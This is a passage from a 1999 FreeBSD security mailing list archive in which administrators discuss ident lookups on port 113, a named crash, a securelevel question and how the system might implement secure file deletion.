1999 01:42:04 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id BAA13721; Fri, 21 May 1999 01:39:32 -0700 (PDT) Message-ID: <19990521013932.A13233@best.com> Date: Fri, 21 May 1999 01:39:32 -0700 From: "Jan B. Koum " To: Greg Quinlan , freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 References: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>; from Greg Quinlan on Fri, May 21, 1999 at 09:31:37AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 21, 1999 at 09:31:37AM +0100, Greg Quinlan wrote: > I am not on the mailing list so please include me in your reply. > > Can someone explain what this remote system is trying to do? > > May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 ip>:113 in via fxp1 > May 21 09:22:35 amanda last message repeated 3 times > > Extract from /etc/services > > auth 113/tcp ident tap #Authentication Service > auth 113/udp ident tap #Authentication Service > > Greg Might be sendmail on going back into your box to get ident info. Or this might be provoced by something else - like tcp wrappers, irc, etc, etc... -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:44:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from rucus.ru.ac.za (rucus.ru.ac.za [146.231.29.2]) by hub.freebsd.org (Postfix) with SMTP id 0B4CE15959 for ; Fri, 21 May 1999 01:44:09 -0700 (PDT) (envelope-from nbm@rucus.ru.ac.za) Received: (qmail 54340 invoked by uid 1003); 21 May 1999 08:44:51 -0000 Date: Fri, 21 May 1999 10:44:51 +0200 From: Neil Blakey-Milner To: Greg Quinlan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 Message-ID: <19990521104451.A53814@rucus.ru.ac.za> References: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>; from Greg Quinlan on Fri, May 21, 1999 at 09:31:37AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri 1999-05-21 (09:31), Greg Quinlan wrote: > I am not on the mailing list so please include me in your reply. > > Can someone explain what this remote system is trying to do? > > May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 ip>:113 in via fxp1 > May 21 09:22:35 amanda last message repeated 3 times > > Extract from /etc/services > > auth 113/tcp ident tap #Authentication Service > auth 113/udp ident tap #Authentication Service It's trying to work out who's doing something to them. Things like IRC, squid, mail, news, and other services sometimes want to know which user on a system is doing things to it. It can usually be ignored. Neil -- Neil Blakey-Milner nbm@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 3:39:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from web114.yahoomail.com (web114.yahoomail.com [205.180.60.86]) by hub.freebsd.org (Postfix) with SMTP id 6F93215196 for ; Fri, 21 May 1999 03:39:39 -0700 (PDT) (envelope-from holtor@yahoo.com) Message-ID: <19990521104344.22917.rocketmail@web114.yahoomail.com> Received: from [209.191.62.241] by web114.yahoomail.com; Fri, 21 May 1999 03:43:44 PDT Date: Fri, 21 May 1999 03:43:44 -0700 (PDT) From: Holtor Subject: named 8.1.2 crash To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, checking threw my /var/log/messages this morning, i've seen something i've never seen before. May 20 23:52:19 greg named[83548]: /usr/src/usr.sbin/named/../../contrib/bind/bin/named/ns_main.c:491: INSIST(evGetNext(ev, &event, EV_WAIT) != -1): Invalid argument failed. May 20 23:52:30 greg /kernel: pid 83548 (named), uid 53: exited on signal 6 May 20 23:52:19 greg named[83548]: /usr/src/usr.sbin/named/../../contrib/bind/bin/named/ns_main.c:491: INSIST(evGetNext(ev, &event, EV_WAIT) != -1): Invalid argument failed. I'm running named 8.1.2, I restarted it and it works okay now, but what caused all that? Thanks, Holt _____________________________________________________________ Do You Yahoo!? Free instant messaging and more at http://messenger.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 5:13:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id D35361527F; Fri, 21 May 1999 05:13:15 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id OAA24582; Fri, 21 May 1999 14:13:14 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id OAA85626; Fri, 21 May 1999 14:13:09 +0200 (MET DST) Date: Fri, 21 May 1999 14:13:09 +0200 From: Eivind Eklund To: CONDOR Cc: chat@FreeBSD.org Subject: Re: secure deletion Message-ID: <19990521141308.A85583@bitbox.follo.net> References: <01BEA2F3.8E3149A0.condor@inreach.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <01BEA2F3.8E3149A0.condor@inreach.com>; from CONDOR on Thu, May 20, 1999 at 06:51:19PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Moving to -chat]. On Thu, May 20, 1999 at 06:51:19PM -0700, CONDOR wrote: > -----Original Message----- > From: Avalon Books [SMTP:avalon@advicom.net] > Sent: Thursday, May 20, 1999 12:52 > To: Dan Langille > Cc: Darren Reed; freebsd-security@FreeBSD.ORG > Subject: Re: secure deletion > > > It seems a bit extreme, but I will admit it *is* a secure erase > method. That's military thinking for you... > > [CONDOR] I saw a good 'government approved CD eraser' at a convention one time. > > -A guy had two heat warped CDs in a toaster.. You want to run them through a microwave oven first. This will break the recording material (not the plastic) into approx 1 inch long areas, using a neat pattern of lightning to do it (I'm not kidding). No prize but passing your physics class if you can say why it goes to approx an inch long pieces, and all the effects then stop. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 5:16:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 033F91527F for ; Fri, 21 May 1999 05:16:40 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id PAA10889; Fri, 21 May 1999 15:16:30 +0300 (EEST) Date: Fri, 21 May 1999 15:16:30 +0300 (EEST) From: Narvi To: Bart Smit Cc: Kiril Mitev , freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 21 May 1999, Bart Smit wrote: > On Thu, 20 May 1999, Kiril Mitev wrote: > > > -> then you (theoretically) should be worried about locking up your > > hardware, rather than wiping your disk :-0 > > Actually it's easier and a lot safer to wipe your disk. It's perfectly > feasible that that the law shows up on your doorstep and insists to take > your hardware if you're an ISP. It takes as little as some determination > from a pseudo-religious sect's lawyers (ask xs4all.nl). Or it might be your laptop, that shouldn't reveal any unneccesary information and be secure against grep. > > -- > Bart > Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 5:53:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 1C80A1531A for ; Fri, 21 May 1999 05:53:36 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA01189; Fri, 21 May 1999 09:09:02 -0400 (EDT) Date: Fri, 21 May 1999 09:09:02 -0400 From: Adam Shostack To: gc Cc: security@FreeBSD.ORG Subject: Re: Secure Deletion Message-ID: <19990521090901.A1155@weathership.homeport.org> References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> <374474D4.2263@iafrica.com.na> <374519D4.403016C2@virtual-pc.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <374519D4.403016C2@virtual-pc.com>; from gc on Fri, May 21, 1999 at 09:31:16AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 21, 1999 at 09:31:16AM +0100, gc wrote: | Could someone enlighten me as to why the first move is not to write back | an inverted copy of the data to even out the residual field before | resorting to other patterns? (this assumes you are deleting a file and | thus still have the data before you start). You mean other than the fact that it doesn't work? :) See Guttman's paper in Usenix Security 96: http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 8:55:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 543A115ABF for ; Fri, 21 May 1999 08:55:17 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA23107; Fri, 21 May 1999 11:55:10 -0400 (EDT) (envelope-from wollman) Date: Fri, 21 May 1999 11:55:10 -0400 (EDT) From: Garrett Wollman Message-Id: <199905211555.LAA23107@khavrinen.lcs.mit.edu> To: wkt@cs.adfa.edu.au Cc: security@FreeBSD.ORG Subject: Lowering securelevel from console? In-Reply-To: <199905210635.QAA10497@henry.cs.adfa.edu.au> References: <199905210635.QAA10497@henry.cs.adfa.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Now, are there any other reasons why lowering securelevel as root from > the console (and no net connectivity) would be a BAD thing? A rogue root process could use the debugger to take control of another process (e.g., getty) and force it to disengage security. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 9:47:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 60BA915014 for ; Fri, 21 May 1999 09:47:09 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA79928; Fri, 21 May 1999 18:46:44 +0200 (CEST) (envelope-from des) To: "Ilmar S. Habibulin" Cc: James Wyatt , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: From: Dag-Erling Smorgrav Date: 21 May 1999 18:46:44 +0200 In-Reply-To: "Ilmar S. Habibulin"'s message of "Thu, 20 May 1999 23:40:42 +0400 (MSD)" Message-ID: Lines: 8 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Ilmar S. Habibulin" writes: > My thoughts are about an option in kernel config file (WIPEINFO?) A mount option would be better. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 9:50: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 6A82114DD3 for ; Fri, 21 May 1999 09:50:01 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA79941; Fri, 21 May 1999 18:49:51 +0200 (CEST) (envelope-from des) To: "Patrick Bihan-Faou" Cc: Darren Reed , Gregory Sutter , wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: <19990520145800.B5E31150AF@hub.freebsd.org> From: Dag-Erling Smorgrav Date: 21 May 1999 18:49:51 +0200 In-Reply-To: "Patrick Bihan-Faou"'s message of "Thu, 20 May 1999 10:57:52 -0400" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Patrick Bihan-Faou" writes: > I agree with that last statement. An implementation on FreeBSD probably does > not need to write multiple times to the disk. Wouldn't work, anyway, unless you disable write caching (not just on the disk, but in the disk driver as well - no soft updates!). Otherwise, all passes but the last will be ignored, unless you wipe a really big file (too big to fit in cache). DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 10: 0: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0B76C159E8 for ; Fri, 21 May 1999 10:00:00 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA79962; Fri, 21 May 1999 18:59:32 +0200 (CEST) (envelope-from des) To: gc Cc: tim@iafrica.com.na, Joel Maslak , security@FreeBSD.ORG Subject: Re: Secure Deletion References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> <374474D4.2263@iafrica.com.na> <374519D4.403016C2@virtual-pc.com> From: Dag-Erling Smorgrav Date: 21 May 1999 18:59:32 +0200 In-Reply-To: gc's message of "Fri, 21 May 1999 09:31:16 +0100" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org gc writes: > Could someone enlighten me as to why the first move is not to write back > an inverted copy of the data to even out the residual field before > resorting to other patterns? (this assumes you are deleting a file and > thus still have the data before you start). Because an inverted copy is encoded (almost) exactly like the original copy. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 10:28:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 31F6514E67 for ; Fri, 21 May 1999 10:28:37 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id VAA18530; Fri, 21 May 1999 21:28:35 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id VAA10557; Fri, 21 May 1999 21:28:34 +0400 (MSD) Date: Fri, 21 May 1999 21:28:34 +0400 (MSD) From: "Ilmar S. Habibulin" To: Dag-Erling Smorgrav Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 21 May 1999, Dag-Erling Smorgrav wrote: > > My thoughts are about an option in kernel config file (WIPEINFO?) > A mount option would be better. Why mount option? Secure deletion is a feature of fs and impacts files of this on this fs. All of them. So why use mount option? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 10:53: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 8EE5115111 for ; Fri, 21 May 1999 10:53:04 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id TAA80088; Fri, 21 May 1999 19:52:57 +0200 (CEST) (envelope-from des) To: "Ilmar S. Habibulin" Cc: Dag-Erling Smorgrav , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: From: Dag-Erling Smorgrav Date: 21 May 1999 19:52:56 +0200 In-Reply-To: "Ilmar S. Habibulin"'s message of "Fri, 21 May 1999 21:28:34 +0400 (MSD)" Message-ID: Lines: 16 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Ilmar S. Habibulin" writes: > On 21 May 1999, Dag-Erling Smorgrav wrote: > > > My thoughts are about an option in kernel config file (WIPEINFO?) > > A mount option would be better. > Why mount option? Secure deletion is a feature of fs and impacts files of > this on this fs. All of them. So why use mount option? Because a mount option can be changed at runtime, whereas a kernel option cannot. A mount option would allow you to enable the security feature on file systems which need it but not on file systems which do not need it, whereas a kernel option would enable it unconditionally on all file systems. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 11: 4:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from orion.ac.hmc.edu (Orion.AC.HMC.Edu [134.173.32.20]) by hub.freebsd.org (Postfix) with ESMTP id 6A61215111 for ; Fri, 21 May 1999 11:04:55 -0700 (PDT) (envelope-from brooks@one-eyed-alien.net) Received: from localhost (brdavis@localhost) by orion.ac.hmc.edu (8.8.8/8.8.8) with ESMTP id LAA11905; Fri, 21 May 1999 11:04:25 -0700 (PDT) From: brooks@one-eyed-alien.net X-Authentication-Warning: orion.ac.hmc.edu: brdavis owned process doing -bs Date: Fri, 21 May 1999 11:04:25 -0700 (PDT) X-Sender: brdavis@orion.ac.hmc.edu To: Dag-Erling Smorgrav Cc: "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 21 May 1999, Dag-Erling Smorgrav wrote: > "Ilmar S. Habibulin" writes: > > Why mount option? Secure deletion is a feature of fs and impacts files of > > this on this fs. All of them. So why use mount option? > > Because a mount option can be changed at runtime, whereas a kernel > option cannot. A mount option would allow you to enable the security > feature on file systems which need it but not on file systems which do > not need it, whereas a kernel option would enable it unconditionally > on all file systems. I'd definaly agree that it should be done on an FS by FS bases, but it seems that a tunefs flag like softupdates might be more appropriate. My reason for this is simply that if you forget to enable the option once and do any write operations to speak of, you will need to completly wipe the entire FS to ensure you actually destroy the old data. Making it a tunefs option would mean that you couldn't forget. -- Brooks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 11:10:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from bogon.kjsl.com (bogon.kjsl.com [205.179.23.2]) by hub.freebsd.org (Postfix) with ESMTP id 32C4715111 for ; Fri, 21 May 1999 11:10:16 -0700 (PDT) (envelope-from javier@bogon.kjsl.com) Received: (from javier@localhost) by bogon.kjsl.com (8.9.3/8.9.3) id LAA25276; Fri, 21 May 1999 11:10:09 -0700 (PDT) From: Javier Henderson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14149.41345.818718.833426@bogon.kjsl.com> Date: Fri, 21 May 1999 11:10:09 -0700 (PDT) To: brooks@one-eyed-alien.net Cc: Dag-Erling Smorgrav , "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: References: X-Mailer: VM 6.63 under Emacs 19.34.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org brooks@one-eyed-alien.net writes: > On 21 May 1999, Dag-Erling Smorgrav wrote: > > > "Ilmar S. Habibulin" writes: > > > Why mount option? Secure deletion is a feature of fs and impacts files of > > > this on this fs. All of them. So why use mount option? > > > > Because a mount option can be changed at runtime, whereas a kernel > > option cannot. A mount option would allow you to enable the security > > feature on file systems which need it but not on file systems which do > > not need it, whereas a kernel option would enable it unconditionally > > on all file systems. > > I'd definaly agree that it should be done on an FS by FS bases, but it > seems that a tunefs flag like softupdates might be more appropriate. My > reason for this is simply that if you forget to enable the option once and > do any write operations to speak of, you will need to completly wipe the > entire FS to ensure you actually destroy the old data. Making it a tunefs > option would mean that you couldn't forget. Just in the interest of throwing ideas around, and not to start an OS war: With VMS, you can define at mount time, or at any time afterwards (ie, while the volume is already mounted) whether you want files erased-on-delete or not. If you change the behavior at some point after mounting the volume, the new behavior will affect deletions made after the change of behavior. There is also a CLI qualifier for the DELETE command, appropriately named /ERASE (e.g., DELETE/ERASE FOO.TXT) that you can use on demand. This kind of flexibility would be cool, I think. -jav To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 11:11: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id A6C13159DB for ; Fri, 21 May 1999 11:10:55 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id UAA29620; Fri, 21 May 1999 20:10:50 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id UAA89224; Fri, 21 May 1999 20:10:44 +0200 (MET DST) Date: Fri, 21 May 1999 20:10:43 +0200 From: Eivind Eklund To: brooks@one-eyed-alien.net Cc: Dag-Erling Smorgrav , "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion Message-ID: <19990521201043.I85583@bitbox.follo.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from brooks@one-eyed-alien.net on Fri, May 21, 1999 at 11:04:25AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 21, 1999 at 11:04:25AM -0700, brooks@one-eyed-alien.net wrote: > On 21 May 1999, Dag-Erling Smorgrav wrote: > > > "Ilmar S. Habibulin" writes: > > > Why mount option? Secure deletion is a feature of fs and impacts files of > > > this on this fs. All of them. So why use mount option? > > > > Because a mount option can be changed at runtime, whereas a kernel > > option cannot. A mount option would allow you to enable the security > > feature on file systems which need it but not on file systems which do > > not need it, whereas a kernel option would enable it unconditionally > > on all file systems. > > I'd definaly agree that it should be done on an FS by FS bases, but it > seems that a tunefs flag like softupdates might be more appropriate. My > reason for this is simply that if you forget to enable the option once and > do any write operations to speak of, you will need to completly wipe the > entire FS to ensure you actually destroy the old data. Making it a tunefs > option would mean that you couldn't forget. Either tunefs or chflags - it would be relatively expensive, so if you only need it for some data, it is probably better to have more fine-grained control than per-FS. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 12:35:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from andrew.cmu.edu (ANDREW.CMU.EDU [128.2.10.101]) by hub.freebsd.org (Postfix) with ESMTP id 169311502C; Fri, 21 May 1999 12:35:09 -0700 (PDT) (envelope-from tcrimi+@andrew.cmu.edu) Received: (from postman@localhost) by andrew.cmu.edu (8.8.5/8.8.2) id PAA20959; Fri, 21 May 1999 15:35:06 -0400 (EDT) Received: via switchmail; Fri, 21 May 1999 15:35:05 -0400 (EDT) Received: from unix6.andrew.cmu.edu via qmail ID ; Fri, 21 May 1999 15:34:57 -0400 (EDT) Received: from unix6.andrew.cmu.edu via qmail ID ; Fri, 21 May 1999 15:34:57 -0400 (EDT) Received: from mms.4.60.Jun.27.1996.03.02.53.sun4.51.EzMail.2.0.CUILIB.3.45.SNAP.NOT.LINKED.unix6.andrew.cmu.edu.sun4m.54 via MS.5.6.unix6.andrew.cmu.edu.sun4_51; Fri, 21 May 1999 15:34:56 -0400 (EDT) Message-ID: Date: Fri, 21 May 1999 15:34:56 -0400 (EDT) From: Thomas Valentino Crimi To: brooks@one-eyed-alien.net, Eivind Eklund Subject: Re: secure deletion Cc: Dag-Erling Smorgrav , "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-Reply-To: <19990521201043.I85583@bitbox.follo.net> References: <19990521201043.I85583@bitbox.follo.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Excerpts from mail: 21-May-99 Re: secure deletion by Eivind Eklund@FreeBSD.OR > Either tunefs or chflags - it would be relatively expensive, so if you > only need it for some data, it is probably better to have more > fine-grained control than per-FS. Might I also suggest a 'normal' user option for one particular file to be securely wiped? Myself I usea simple replacement for rm I call wipe. It overwrites, fsyncs, overwrites again with the 10101, 01010 pattern, zero's out the file, renames it to a random direntry and then unlinks (whoa.. talk about what would happen to hardlinks :). As an extra opton to rm, for a user to be able to tell the kernel to securely delet a file even though it isn't routinely flagged for it (having to chflags then rm for each case is rather silly, although rm -w or something should do it for you). BTW, might I taek it thatwith the kernel deletion method, a warning should occur if you attemp to delete a secure file which still has a hardlink to it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 16:16:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id D8F2914DF2 for ; Fri, 21 May 1999 16:16:27 -0700 (PDT) (envelope-from ben@narcissus.net) Received: by narcissus.net (Postfix, from userid 1000) id 2EE85184; Fri, 21 May 1999 19:08:00 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id 1FC7D183; Fri, 21 May 1999 19:08:00 -0400 (EDT) Date: Fri, 21 May 1999 19:08:00 -0400 (EDT) From: Snob Art Genre To: Patrick Bihan-Faou Cc: Darren Reed , Gregory Sutter , wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <19990520145800.B5E31150AF@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 20 May 1999, Patrick Bihan-Faou wrote: > - basic: what the original poster was suggesting: writing garbage data (be > it zero or some pattern) over the deleted chunks. The clear advantage of > that is that if you try to recover the freed blocks on a system comparable > to the original system, you will probably not get anything useful out of the > disk. If I understand correctly, it's conceivable that someone could break into my system over the network and get access to the raw disk device, and thereby read data that have been deleted but not overwritten. That's a good bit easier than physically breaking in and taking the disk. So I can see some use for functionality that overwrites files on unlink() thoroughly enough to prevent further reading by the disk head, even if it offers no protection against the kind of specialized reading devices that can be used on a captured hard disk platter. I'm not advocating this measure so much as pointing out that there is a perceptible level of security between what we currently have and military-grade. Ben @narcissus.net -- finally To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 16:19:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id ECF561564C for ; Fri, 21 May 1999 16:19:44 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1172 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 21 May 1999 18:04:40 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Fri, 21 May 1999 18:04:40 -0500 (CDT) From: James Wyatt To: "Ilmar S. Habibulin" Cc: Dag-Erling Smorgrav , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 21 May 1999, Ilmar S. Habibulin wrote: > On 21 May 1999, Dag-Erling 